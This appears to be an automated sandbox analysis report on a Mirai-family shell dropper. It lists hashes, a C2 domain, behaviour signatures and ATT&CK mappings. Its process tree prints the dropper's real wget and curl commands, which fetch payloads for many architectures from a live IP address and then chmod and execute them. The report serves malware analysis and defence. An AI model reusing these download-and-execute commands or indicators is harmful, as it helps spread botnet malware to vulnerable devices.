Analysis
-
max time kernel
149s -
max time network
148s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
-
submitted
15-11-2024 03:57
General
-
Target
zeros6x.sh
-
Size
2KB
-
MD5
642df6d1dacbef4e6df51eb185893408
-
SHA1
b5536f3af73f31a31bda2bbf6467a28eb14bd50a
-
SHA256
c58d8c70b82f2ecb99af380bd00a926428a5883dc910edc92dea36c44bce8eab
-
SHA512
7deb4c9a41575f1f0092b9430909ce93ccd7273f8900b4dafbd750cbe5926d559a6666dc629611de0db4a33a5c8ab5c9811a783835ae87479f02f45fdfb8a629
Malware Config
Extracted
mirai
UNSTABLE
server.myway-ing.win
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
server.myway-ing.win
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 2 IoCs
-
Executes dropped EXE 13 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Writes file to system bin folder 4 IoCs
-
Changes its process name 2 IoCs
-
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 26 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/zeros6x.sh/tmp/zeros6x.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://154.216.16.71/zmap.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.x862⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.x862⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.mpsl2⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.mpsl2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm2⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.arm2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm52⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.arm52⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm62⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.arm62⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm72⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.arm72⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.ppc2⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.ppc2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.m68k2⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.m68k2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.spc2⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.spc2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.i6862⤵
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.i6862⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.i6862⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.sh42⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.sh42⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://154.216.16.71/zmap.arc2⤵
-
-
/usr/bin/curlcurl -O http://154.216.16.71/zmap.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arc2⤵
-
-
/bin/chmodchmod +x systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-17t2Xv WTH zeros6x.sh zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH ssh.arc2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD5192b6eb8dcf1ad172064c832fbb47b92
SHA1a2af8812f96d0748f3a119a4419ff65dcffb179c
SHA256a97f5317845c7053e64d0d8d5e076532de7a2c98189eb7304b8e0e742e61e93d
SHA5127ad2efc28832cf1312c00bccf6866669938b0f4787999b7112f750377aa5582b8c508bedba29f482dadceb6a1c3868ce87220cdded44399a1cd325ab9bfd7e9a
-
Filesize
94KB
MD5b4458e4fa2efcf88bfa2aaeda864519e
SHA18263798736379ed4ce23ef75e4d1f606e05c815b
SHA256146ef07d918f77546ba8112e9f307361f9d54af4886dba7fc4ba9e58bc8c5d47
SHA5124aa6068f6e3ed09c6706c37f046cd4081a5c7de3e307860e67ff9fff426a281f33dbb027bbcb36b0fd9df6dccd083308d78f43948009ccdcc3676ed4ff063010
-
Filesize
74KB
MD58a666a51d2aeb8e106c7c9a302aa3acb
SHA1c222cd4760966db8f2461c4dc034f9f3fe912eb2
SHA2567b6c76af31adf965e62b5c726ea382825eb5f2aefc7e7331b192e0d4c809fe46
SHA512b48dd376f4e801bd6ea3351a1726a45d1b895f25f534d9d211b1023195881211f3b52f02914317899f122d71b88775e912f6092e5fe7d83565b3fd23012a04ac
-
Filesize
49KB
MD5803219db4e5384144e86c388e558a530
SHA1c8cb8ec327c2a53a6a5fa42d8c2886161defff89
SHA2560edc353b0bc96801a0a2d654427c9f51991f3500a3a43070d9c5828efadd352e
SHA512ccc7ee4ea8f672dd7d8df15e809b6cd9250ec80c0edbd929f0f8ab794c07bcf6ca7aade1f47898348b999f729b1ed6b47d4abed73eb8d2c94eac023fd5cf6332
-
Filesize
152KB
MD504bd1585a8ca785193b158d27307e80b
SHA120faf0e3c7f878f134142f71c9f5b7d58ce5ab17
SHA256272f6e7e0d6dd601ef8110959bc6907cf4531a87fc3e6a5b3ab7d32d1fa3d2ee
SHA512d92b33a37dbd627faaf48ed65f785191ea8fccb104e15801d64160885e6244a7a98bc17ae1a5eb9e0c9d7f4b5f807174c2aff30d7235be4e8a19b271cd1fc2f2
-
Filesize
61KB
MD58edb75406d233f4201e85fd2d746c114
SHA179272fc7bf16c8f354efa0b4b59bcdf0f929fa0a
SHA256e1f60f41d27140942ad74ef1f1bae26fc98787fed03c91d3c4a33e5390b6d3be
SHA512df424a671363b4a9d6480a3210e9b135dfbce80bb9e8af7f2b931c5ba51deb8256d54b505dd418091f03c4139ccec955cc00cfeb1456e791c37d7abb5a1253c5
-
-